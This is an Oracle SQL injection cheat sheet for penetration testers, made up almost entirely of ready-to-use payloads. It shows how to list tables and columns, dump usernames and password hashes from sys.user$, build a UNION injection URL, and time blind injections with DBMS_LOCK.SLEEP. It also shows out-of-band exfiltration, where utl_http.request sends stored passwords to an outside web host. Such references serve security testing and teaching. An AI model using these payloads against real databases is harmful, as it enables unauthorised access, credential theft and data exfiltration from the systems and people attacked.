Introduction
Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.
ORACLE SQL Injection Notes
In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.
i.e. SELECT 'dummydata' || 'x' FROM DUAL;
You have to close comments if you used / comment / style comments
Concatenation
SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;
Comments
/ comment /
Note : You have to close this comments properly otherwise you'll get syntax error.
Line comment : --
Casting
For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;
Strings without quotes
SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;
Getting Stuff
Getting Tables
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Getting Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name
SELECT global_name FROM global_name
Getting Users and Passwords
SELECT name, password FROM sys.user$ where type#=1
Getting version
Select banner || '-' || (select banner from vversion where banner like 'TNS%'
Getting Current User
SELECT user FROM dual
Simple Union Query
http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL
Simulating SQL Server's TOP feature
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;
Moving Records one by one
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;
Functions useful for Blind SQL Injetion
BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
CHR() - Convert to Char
ASCII() - Convert to ASCII
SUBSTR() - Substring
BITAND() - Bit And operation
LOWER() - Convert to LowerCase
Doing outbound connections
SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;
You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.
References, Papers & Credits
Thanks to Pentestmonkey, Notsosecure, Alexander Kornbrust
SQL Injection Attacks for ORACLE Developers
Red Database Security Papers
SQL Injection Cheat Sheet
Document History
02/10/2007 - Public Release
02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
09/10/2007 - Sleep function added
